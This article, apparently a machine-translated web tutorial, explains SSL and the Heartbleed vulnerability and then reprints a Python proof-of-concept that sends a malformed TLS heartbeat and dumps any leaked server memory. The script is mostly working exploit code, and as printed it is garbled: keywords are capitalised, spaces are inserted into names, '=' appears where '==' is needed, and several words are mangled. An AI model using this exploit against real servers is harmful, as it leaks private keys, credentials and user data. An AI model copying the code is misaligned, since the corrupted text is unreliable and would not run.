This article mainly introduces a Python script for detecting the OpenSSL Heartbleed vulnerability. the Heartbleed vulnerability is an earthquake on the Internet, and some people who have seen it quickly upgrade OpenSSL to avoid hacker intrusion.
What is SSL?
SSL is a popular encryption technology that protects users' privacy information transmitted over the Internet. After the website uses this encryption technology, a third party cannot read any communication information between you and the website. In the background, only the receiver can decrypt the encrypted data through SSL.
SSL was first launched by Netscape in 1994 and has been adopted by all mainstream browsers since the 1990 s.
What is the "Heartbleed" vulnerability?
The SSL standard contains a heartbeat option that allows the SSL connection to a computer at one end to send a brief message, confirm that the computer at the other end is still online, and obtain feedback. Researchers have discovered that malicious heartbeat information can be sent by clever means to trick computers on the other end into leaking confidential information. The affected computer may be cheated and sent to the server memory.
Who found this problem?
This vulnerability was independently discovered by Codenomicon and Google security researchers. To minimize the impact, the researchers have already worked with the OpenSSL team and other key insiders to prepare a solution before releasing the issue.
Python script for detecting OpenSSL Heartbleed vulnerability
The code is as follows:
#! /Usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
Import sys
Import struct
Import socket
Import time
Import select
Import re
From optparse import OptionParser
Options = OptionParser (usage = '% prog server [options]', description = 'Test for SSL heartbeat vulnerability (CVE-2014-0160 )')
Options. add_option ('-p',' -- port', type = 'int', default = 443, help = 'tcp port to test (default: 443 )')
Def h2bin (x ):
Return x. replace ('',''). replace ('\ n', ''). decode ('Hex ')
Hello = h2bin ('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
Bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
C0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
C0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
C0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
C0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
Hb = h2bin ('''
18 03 02 00 03
01 40 00
''')
Def hexdump (s ):
For B in xrange (0, len (s), 16 ):
Lin = [c for c in s [B: B + 16]
Hxdat = ''. join ('% 02x' % ord (c) for c in lin)
Pdat = ''. join (c if 32 <= ord (c) <= 126 else '.') for c in lin)
Print '% 04x: %-48 s % s' % (B, hxdat, pdat)
Print
Def recvall (s, length, timeout = 5 ):
Endtime = time. time () + timeout
Rdata =''
Remain = length
While remain> 0:
Rtime = endtime-time. time ()
If rtime <0:
Return None
R, w, e = select. select ([s], [], [], 5)
If s in r:
Data = s. recv (remain)
# EOF?
If not data:
Return None
Rdata + = data
Remain-= len (data)
Return rdata
Def recvmsg (s ):
Hdr = recvall (s, 5)
If hdr is None:
Print 'unexpected EOF processing ing record header-server closed connection'
Return None, None, None
Typ, ver, ln = struct. unpack ('> bhh', hdr)
Pay = recvall (s, ln, 10)
If pay is None:
Print 'unexpected EOF processing ing record payload-server closed connection'
Return None, None, None
Print '... received message: type = % d, ver = % 04x, length = % d' % (typ, ver, len (pay ))
Return typ, ver, pay
Def hit_hb (s ):
S. send (hb)
While True:
Typ, ver, pay = recvmsg (s)
If typ is None:
Print 'no heartbeat response encoded ed, server likely not vulnerable'
Return False
If typ = 24:
Print 'stored Ed heartbeat response :'
Hexdump (pay)
If len (pay)> 3:
Print 'Warning: server returned more data than it shoshould-server is vulnerable! '
Else:
Print 'server processed malformed heartbeat, but did not return any extra data .'
Return True
If typ = 21:
Print 'stored Ed alert :'
Hexdump (pay)
Print 'server returned error, likely not vulnerable'
Return False
Def main ():
Opts, args = options. parse_args ()
If len (args) <1:
Options. print_help ()
Return
S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Print 'ing ing ...'
Sys. stdout. flush ()
S. connect (args [0], opts. port ))
Print 'sending Client Hello ...'
Sys. stdout. flush ()
S. send (hello)
Print 'waiting for Server Hello ...'
Sys. stdout. flush ()
While True:
Typ, ver, pay = recvmsg (s)
If typ = None:
Print 'server closed connection without sending Server Hello .'
Return
# Look for server hello done message.
If typ = 22 and ord (pay [0]) = 0x0E:
Break
Print 'sending heartbeat request ...'
Sys. stdout. flush ()
S. send (hb)
Hit_hb (s)
If _ name _ = '_ main __':
Main ()